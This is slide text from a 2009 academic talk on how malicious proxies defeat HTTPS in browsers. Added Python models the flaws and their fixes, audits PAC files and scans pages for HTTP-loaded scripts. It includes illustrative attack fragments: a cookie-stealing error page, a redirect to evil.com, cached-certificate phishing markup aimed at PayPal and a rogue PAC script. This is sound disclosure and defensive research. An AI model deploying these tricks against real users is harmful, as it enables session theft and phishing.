Slide 1
IEEE Symposium on Security and Privacy, May 2009
Shuo Chen†, Ziqing Mao† ‡, Yi-Min Wang†, Ming Zhang†
†Microsoft Research ‡Purdue University
May 20th, 2009
Slide 2
HTTPS: end-to-end secure protocol for web traffic.
Adversary assumption: MITM (man-in-the-middle).
[Figure: browser, proxy, Internet, HTTPS server; the SSL tunnel runs end to end from the browser, through the proxy and the Internet, to the HTTPS server]
Are today's browser implementations consistent with this assumption?
Slide 3
Key finding: a class of browser vulnerabilities (demo) in which a proxy can defeat the end-to-end security promised by HTTPS.
Vulnerabilities exist in all major browsers.
Industry outreach: technical work finished in summer 2007; paper withheld until this conference; worked with all vendors to address the issues.
Slide 4
[Figure: protocol stacks of the browser, the PBP (Pretty-Bad-Proxy) and the HTTPS server, each with the layers TCP/IP, HTTP/HTTPS and rendering modules. The browser-to-proxy hop is unencrypted; the SSL tunnel through the proxy to the server is encrypted.]
Slide 5
Key issue: browsers load unencrypted content from the proxy in the HTTPS context of the victim server.
Attack 1: proxy's error response
Attack 2: proxy's redirection
Attack 3: HTTP-intended pages that are HTTPS-loadable
Attack 4: visual context (GUI behavior, no script)
Slide 6
<iframe src="https://bank.com">
Proxy's error page: e.g., 502 server not found, or any other 4xx/5xx response.
Script in the error page runs in https://bank.com.
[Figure: the browser requests https://bank.com through the PBP; instead of tunneling to the bank server, the PBP answers "502: Server not found" with its own page, and the browser renders that page as https://bank.com]
Slide 7
<script src="https://js.bank.com/foo.js">
[Figure: the browser requests https://js.bank.com through the PBP; instead of tunneling to the bank.com server, the PBP answers "HTTP 302: redirection to https://evil.com", and the browser then fetches https://evil.com from the evil.com server]
Script will run in the context of https://bank.com.
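Attacks 1 and 2 both hinge on what a browser does with a proxy's reply to the tunnel request. A browser that fetches https://bank.com through a proxy first sends the proxy an HTTP CONNECT request; only after a 2xx reply does TLS with bank.com start, so any 4xx/5xx body or 3xx Location in that reply is unauthenticated proxy output. The following model is an added example, not code from the paper or from any browser: it shows where the resulting bytes come from and which origin they run in, once for the behaviour the talk describes and once for the fixed behaviour. The host names, the `ProxyReply` shape and the `steal()` call in the error page are assumptions made for the illustration.

```python
"""Browser handling of a proxy's reply to CONNECT: the bug and the fix.

Added example (not code from the paper or from any browser). Host names,
the ProxyReply shape and the steal() call are assumptions for illustration.
"""
from dataclasses import dataclass, field


@dataclass
class ProxyReply:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def origin(url):
    """Scheme plus host of a URL, the security context a document runs in."""
    scheme, rest = url.split("://", 1)
    return scheme + "://" + rest.split("/", 1)[0]


# Constructed attacker responses: what a Pretty-Bad-Proxy returns instead of
# the tunnel the browser asked for.
def pbp_error_reply():
    """Attack 1: a scripted '502 server not found' page."""
    return ProxyReply(502, {"Content-Type": "text/html"},
                      "<html>502 Server not found"
                      "<script>steal(document.cookie)</script></html>")


def pbp_redirect_reply():
    """Attack 2: redirect the CONNECT for js.bank.com to evil.com."""
    return ProxyReply(302, {"Location": "https://evil.com/foo.js"})


def connect_through_proxy(target_url, reply, strict):
    """Return (source_of_bytes, origin_they_run_in) for one CONNECT attempt.

    strict=False models the behaviour the talk describes: a proxy error page
    is rendered in the target's HTTPS origin and a proxy redirect is followed
    as if the target had sent it.  strict=True models the fix: anything other
    than 2xx is a connection failure; the proxy body is discarded, Location
    is ignored, and the browser shows its own error page in a null origin.
    """
    target_origin = origin(target_url)
    if 200 <= reply.status < 300:
        return "tunnel:" + target_origin, target_origin   # TLS to the real host follows
    if not strict:
        if 300 <= reply.status < 400:
            return "redirect:" + reply.headers.get("Location", ""), target_origin
        return "proxy-body:" + reply.body, target_origin
    return "browser-error-page", "null"


def frame_load(src, reply, strict):
    """<iframe src=src>: where do the rendered bytes come from, in which origin?"""
    return connect_through_proxy(src, reply, strict)


def script_load(page_url, src, reply, strict):
    """<script src=src> on page_url.  Script bytes always run in the including
    page's origin, so the only defence is to refuse proxy-substituted bytes.
    Returns (source, page_origin); source is None when nothing runs."""
    source, _ = connect_through_proxy(src, reply, strict)
    if source == "browser-error-page":
        return None, origin(page_url)
    return source, origin(page_url)
```

The point of `strict=True` is that the 2xx/non-2xx decision is the only place where the browser can tell proxy-authored bytes from bytes that will be authenticated by the server's certificate; once the body or the redirect has been handed to the rendering modules with the target's origin attached, nothing downstream can recover the distinction.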
Slide 8
Many websites provide both HTTP and HTTPS services:
Sensitive pages, e.g., checkout: HTTPS only
Non-sensitive pages, e.g., merchandise: intended for HTTP access
However, non-sensitive pages are often accessible through HTTPS as well! We call them HPIHSL pages (HTTP-intended, HTTPS-loadable).
What's wrong with HPIHSL pages? They often import scripts through HTTP.
The scripts will run in the HTTPS context.
[Figure: a non-sensitive HPIHSL page, loaded over HTTPS, importing HTTP scripts]
Slide 9
Browsers warn about HTTP resources in HTTPS contexts, don't they?
The detection logic only determines the address bar's appearance.
The address bar only concerns the top-level page, so ...
Slide 10
Top level: HTTP.
Hidden iframe: HTTPS for an HPIHSL page, which imports http://resources.jcpenny.com/foo.js over plain HTTP; the PBP can replace foo.js with an attack script, which then runs in the HTTPS context of the iframe.
Using an HTTPS iframe in an HTTP top-level page keeps the address bar unchanged, so no mixed-content warning appears.
Slide 11
It is very easy to find HPIHSL pages that import scripts.
The paper shows 12 websites having this problem; these HTTPS domains are not trustworthy. They cover a wide range:
Online shopping sites
Banks, credit card companies
Open source project management site
Top computer science departments
Even the home domain of a leading certificate authority
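The HPIHSL condition on slides 8 to 11 is something a site owner can check for mechanically: fetch each page that answers over HTTPS and list every active subresource whose effective URL is plain http://. The scanner below is an added example, not code from the paper; it uses only the standard library and resolves relative, protocol-relative and `<base href>`-adjusted URLs the way a browser would, so that only genuinely HTTP-scheme imports are reported. The sample document and the host names in it are constructed for the illustration.

```python
"""Find HTTP-loaded active content in a page that is reachable over HTTPS.

Added example (not from the paper).  The sample page and its host names
are constructed for the illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tag/attribute pairs that deliver active content into the page's context.
ACTIVE = {("script", "src"), ("link", "href"), ("iframe", "src"),
          ("frame", "src"), ("object", "data"), ("embed", "src")}


class SubresourceCollector(HTMLParser):
    def __init__(self, base_url):
        super().__init__()
        self.base = base_url
        self.found = []          # (tag, resolved_url, scheme)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and attrs.get("href"):        # <base href> changes resolution
            self.base = urljoin(self.base, attrs["href"])
            return
        if tag == "link" and "stylesheet" not in (attrs.get("rel") or "").lower():
            return                                     # icons etc. are not active content
        for t, a in ACTIVE:
            if tag == t and attrs.get(a):
                url = urljoin(self.base, attrs[a].strip())
                self.found.append((tag, url, urlsplit(url).scheme))


def insecure_subresources(html, page_url):
    """Return (tag, url) for every active subresource fetched over plain HTTP
    when `page_url` is loaded over HTTPS.  Relative and protocol-relative
    (//host/...) URLs inherit https and are therefore not flagged."""
    https_url = page_url.replace("http://", "https://", 1)
    p = SubresourceCollector(https_url)
    p.feed(html)
    return [(tag, url) for tag, url, scheme in p.found if scheme == "http"]


def is_hpihsl_candidate(html, page_url, loads_over_https):
    """The talk's condition: a page intended for HTTP that is also loadable
    over HTTPS (the caller establishes that by fetching it) and that imports
    active content over HTTP."""
    return loads_over_https and bool(insecure_subresources(html, page_url))


# Constructed sample: a merchandise page of a fictional shop.
SAMPLE_PAGE = """<html><head>
<script src="http://resources.shop.example/foo.js"></script>
<script src="//cdn.shop.example/bar.js"></script>
<script src="/static/baz.js"></script>
<link rel="stylesheet" href="http://resources.shop.example/site.css">
<link rel="icon" href="http://resources.shop.example/favicon.ico">
</head><body><iframe src="http://ads.example/frame.html"></iframe></body></html>"""
```

Running `insecure_subresources(SAMPLE_PAGE, "http://www.shop.example/merchandise")` reports foo.js, site.css and the ads frame but not bar.js or baz.js, which is exactly the distinction a site fix needs: rewriting the flagged imports to https:// or to protocol-relative URLs removes the HTTP fetch the PBP could tamper with.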
Slide 12
In attack 1, script in the proxy's error page runs in the HTTPS context (all browsers).
This attack uses no script, only static HTML; it is due to GUI behavior.
IE, Opera and Chrome display a certificate on the GUI as long as it is in the certificate cache.
Slide 13
Schedule a one-second timer for refreshing the page:
<head><meta HTTP-EQUIV="Refresh" CONTENT="1; URL=https://www.paypal.com"></head>
Before the timer expires, cache a PayPal certificate:
<img src="https://www.paypal.com/a.jpg" style="display:none">
[Figure: the PBP answers the request for https://www.paypal.com with its own response page (5xx) carrying the two lines above; the browser gets a.jpg from the real server, which caches the PayPal certificate; on refresh the PBP serves the phishing page as another 5xx response, and the browser shows it together with the cached certificate]
A perfect GUI spoofing attack: fresh browser, single tab, address bar input.
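The cached-certificate attack works because the indicator is keyed on the host in the address bar rather than on the connection that delivered the document. The following replay is an added example, not code from the paper or from any browser: it runs the three-step sequence on this slide against the flawed indicator policy the talk describes and against a policy that binds the indicator to the top-level document's own TLS connection. The `Response` shape, the cache API and the host names are assumptions made for the illustration; no real certificates are involved.

```python
"""Cached-certificate GUI spoofing (attack 4) and the indicator fix.

Added example (not code from the paper or any browser).  The Response
shape, the cache API and the host names are assumptions for illustration.
"""
from dataclasses import dataclass


@dataclass
class Response:
    url: str
    status: int
    delivered_over_tls: bool   # True only if the bytes came through an SSL tunnel to the host
    cert_subject: str = ""     # subject of the cert that authenticated that tunnel, if any


def host(url):
    return url.split("://", 1)[1].split("/", 1)[0]


class CertCache:
    """Per-host cache of the last certificate seen on a genuine TLS connection."""
    def __init__(self):
        self._by_host = {}

    def record(self, resp):
        if resp.delivered_over_tls:
            self._by_host[host(resp.url)] = resp.cert_subject

    def lookup(self, h):
        return self._by_host.get(h)


def indicator_cached(cache, top_level):
    """Flawed policy: show a certificate whenever one is cached for the
    address-bar host, regardless of how the current document arrived."""
    return cache.lookup(host(top_level.url))


def indicator_bound(cache, top_level):
    """Fixed policy: only the certificate that authenticated this document's
    own connection counts; a proxy-supplied 5xx page has none."""
    return top_level.cert_subject if top_level.delivered_over_tls else None


def replay(policy):
    """Run the slide's sequence and return the indicator shown for each of
    the two top-level loads: the proxy's first page, then the phishing page."""
    cache = CertCache()
    shown = []
    # 1. User types https://www.paypal.com; the PBP answers with its own 5xx
    #    page containing the meta refresh and the hidden <img>.
    first = Response("https://www.paypal.com/", 502, delivered_over_tls=False)
    cache.record(first)
    shown.append(policy(cache, first))
    # 2. The hidden <img> is fetched from the real server through a genuine
    #    SSL tunnel, so the browser caches PayPal's certificate.
    img = Response("https://www.paypal.com/a.jpg", 200, True, "www.paypal.com")
    cache.record(img)
    # 3. After one second the refresh reloads the top level; the PBP serves
    #    the phishing page, again as a 5xx with no TLS to the host.
    phish = Response("https://www.paypal.com/", 502, delivered_over_tls=False)
    cache.record(phish)
    shown.append(policy(cache, phish))
    return shown
```

With `indicator_cached` the second load shows "www.paypal.com" although no byte of the phishing page was authenticated by that certificate; with `indicator_bound` neither load shows a certificate, because the indicator is derived from the document's connection and cannot be primed by an unrelated subresource fetch.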
Slide 14
Slide 15
Proxies are used in many environments:
Corporate and university networks
Hospitals, hotels
Third-party free proxies
Due to PBP issues, the security of HTTPS communication depends on the proxy's integrity.
Is the proxy infected by viruses, hijacked by attackers or configured by malicious insiders?
Slide 16
All these attacks work as long as:
(1) The attacker can sniff your machine at the link layer. For HTTPS, you need to assume this.
(2) The browser has its proxy capability ON, through WPAD (Web Proxy Auto Discovery), a PAC script (Proxy Auto Config script), or manual configuration.
Slide 17
[Figure: the client's GET /wpad.dat is answered by the attacker with PBP_cfg, while the legitimate server's answer to the same GET /wpad.dat would return goodProxy_cfg]
Our test bed: proxy required for web traffic to the Internet
WPAD (default), PAC-script-config or manual-config
Tested on Ethernet
Tested on open wireless network
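Two checks a network or endpoint team can run follow from this slide: which DNS names a WPAD client will ask for, i.e. the names an on-link attacker only needs to answer first, and whether a PAC script that arrived through WPAD names a proxy the organization does not operate (the PBP_cfg case). The code is an added example, not the paper's test-bed code. `wpad_candidates` follows the name devolution described in the WPAD Internet-Draft (strip the host label, then drop one label at a time, stopping before the bare TLD); that it matches a given client's exact behaviour is an assumption. `proxies_in_pac` extracts proxy endpoints by text matching rather than by evaluating the JavaScript, which is enough for an allowlist check. The PAC texts and the names in them are constructed for the illustration.

```python
"""WPAD attack surface and a PAC allowlist audit.

Added example (not the paper's test-bed code).  wpad_candidates follows the
devolution in the WPAD Internet-Draft; the PAC texts are constructed.
"""
import re


def wpad_candidates(client_fqdn, min_labels=2):
    """host.dept.example.com -> [wpad.dept.example.com, wpad.example.com].
    Drops the host label, then one domain label per step, and stops before
    the bare TLD (min_labels=2 keeps at least 'example.com')."""
    labels = client_fqdn.lower().rstrip(".").split(".")[1:]
    out = []
    while len(labels) >= min_labels:
        out.append("wpad." + ".".join(labels))
        labels = labels[1:]
    return out


# Proxy directives a PAC return value can contain: "PROXY host:port",
# "HTTPS host:port", "SOCKS host:port", "SOCKS4 ...", "SOCKS5 ...".
_PROXY_RE = re.compile(r'\b(?:PROXY|HTTPS|SOCKS5?|SOCKS4)\s+([A-Za-z0-9.\-]+:\d+)', re.I)


def proxies_in_pac(pac_text):
    """Every host:port a PAC script could direct traffic to (text match,
    no JavaScript evaluation, so branches are not followed but all are seen)."""
    return sorted(set(m.group(1).lower() for m in _PROXY_RE.finditer(pac_text)))


def audit_pac(pac_text, allowed):
    """Endpoints the PAC script names that are not on the allowlist.
    A non-empty result for a WPAD-fetched PAC is the PBP_cfg case."""
    allowed = {a.lower() for a in allowed}
    return [p for p in proxies_in_pac(pac_text) if p not in allowed]


# Constructed PAC script: mirrors the corporate one but routes HTTPS through
# an attacker-controlled proxy first, falling back to the real one.
PBP_CFG = """
function FindProxyForURL(url, host) {
    if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example"))
        return "DIRECT";
    if (url.substring(0, 6) == "https:")
        return "PROXY pbp.attacker.example:8080; PROXY proxy.corp.example:8080";
    return "PROXY proxy.corp.example:8080";
}
"""

# Constructed PAC script: the legitimate configuration.
GOOD_PROXY_CFG = """
function FindProxyForURL(url, host) {
    if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example"))
        return "DIRECT";
    return "PROXY proxy.corp.example:8080";
}
"""
```

For a client named `pc1.dept.corp.example.com`, `wpad_candidates` yields three names, each of which a spoofed DNS or DHCP answer on the local link can point at the attacker; `audit_pac(PBP_CFG, ["proxy.corp.example:8080"])` returns the rogue endpoint while the legitimate script audits clean. The regex deliberately requires whitespace after the directive keyword so that identifiers such as `FindProxyForURL` are not mistaken for directives.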
Slide 18
Vendor status per issue and browser version:

Issue                    | IE 8 (since beta 2)            | Firefox 3.0.10 | Safari 3.2.2 (or before) | Opera (since Dec. 2007) | Chrome 1.0.154.53
Error-response issue     | Fixed                          | Fixed          | Fixed                    | Fixed                   | Fixed
Redirection issue        | N/A                            | Fixed          | Fixed                    | Fixed                   | N/A
HPIHSL issue             | Fix suggested for next version | Fix proposed   | Acknowledged             | Acknowledged            | Acknowledged
Cached-certificate issue | Fixed                          | N/A            | N/A                      | Fixed                   | Fixed

Besides point fixes, how can we systematically prevent (or find) these bugs and future PBP issues?
Slide 19
Not a fundamental "solution": HTTPS security should not depend on the network. However, it is worthwhile to have mitigations, because:
Some issues are not patched
New issues may be found in the future
Mitigations:
Wireless router: use WPA (WiFi Protected Access)
Corporate network: deploy IPSec on many types of servers, not only web servers but also DNS, DHCP and PAC servers
Travelling employees: secure VPN to your corporate networks
Slide 20
The PBP adversary targets the rendering modules: encrypted and unencrypted contents get confused.
[Figure: layers TCP/IP, HTTP/HTTPS, rendering modules]
Developers of rendering modules need to deal with MITM: the HTTPS layer does not mask the MITM from the rendering modules.
Beyond HTTPS: other end-to-end protocols, e.g., Kerberos, IPSec, etc.
E.g., HTTP over IPSec using Kerberos authentication: what do you want to achieve if a proxy is in between?
Slide 21
HTTPS is flawed.
We argue that many proxies are not secure enough to tunnel HTTPS.
We advocate link layer security.
In addition to browser issues, we also show issues in WPAD, etc.
Slide 22
OCCUR: a free web service for timestamping research ideas
Why: some research contributions cannot be published immediately, e.g., due to responsible disclosure policy.
What: OCCUR gives your idea a timestamp from VeriSign.
Details: search for "Microsoft OCCUR" or ask me offline.
http://research.microsoft.com/en-us/projects/occur/